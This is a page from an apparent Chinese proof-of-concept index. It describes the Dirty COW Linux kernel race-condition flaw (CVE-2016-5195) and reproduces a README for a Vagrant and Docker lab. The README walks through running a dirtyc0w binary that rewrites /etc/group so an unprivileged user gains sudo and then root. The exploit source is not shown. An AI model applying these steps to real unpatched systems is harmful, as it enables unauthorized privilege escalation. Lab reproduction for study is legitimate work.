漏洞平台

POC详情： 672267d66a73cb47d6725e15623b68178235bd32

来源

https://github.com/zakariamaaraki/Dirty-COW-CVE-2016-5195-

关联漏洞

标题： Linux kernel 竞争条件问题漏洞 (CVE-2016-5195)
描述：Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞，该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。

描述

Exploit the dirtycow vulnerability to login as root

介绍

# Dirtyc0w Docker POC


# Prerequisites:

- Vagrant installed

# How to use

Firstly clone the project
``
git clone https://github.com/BrolyCode/Dirty-Cow.git 
``
Get into the folder
``
cd Dirty-Cow
``
Then run up the environment with the command
```
vagrant up
```
Once the server is built, we will ssh into it
```
vagrant ssh
```
change to the root user
```
sudo -i
```
Now we can log on as the hacker 
```
docker exec -it -u hacker nginx bash
```
In the directory we are logged into we have the following files
```
drwxrwxrwt  2 root root  4096 Nov  26 11:10 .
drwxr-xr-x 41 root root  4096 Nov  26 11:10 ..
-rwxr-xr-x  1 root root  9880 Nov  26 04:52 dirtyc0w
-rwxrwxrwx  1 root root  9880 Nov  26 04:52 dirtyc0w.c
```
If we cat the file `/etc/group` we see
```
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
....

```

We can try to login as a root
```
sudo -i

```
But the system will refuse to, because We don't have the right to access. We will now exploit the fail on `/etc/group`
```
./dirtyc0w 
```
It will print out the following to the terminal, we must wait a litle bit of time (2/3 minutes).
```
mmap 7fd0facf4000

madvise 0

procselfmem 1500000000
```
Then we will cat `/etc/group` again
```
hacker@27862a2f9973:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:hacker
...

```

Login as root
```
sudo -i

root@27862a2f9973:~#
```



# Clean Up

Exit back to your host machines terminal and issue `vagrant destroy`

文件快照


 [4.0K]  /data/pocs/672267d66a73cb47d6725e15623b68178235bd32
├── [4.0K]  dirtyc0w
│   ├── [3.1K]  dirtyc0w.c
│   ├── [ 318]  Dockerfile
│   └── [  50]  exploit.sh
├── [1.3K]  nginx-docker
├── [1.8K]  README.md
├── [ 968]  servers.yaml
└── [1.0K]  Vagrantfile

1 directory, 7 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。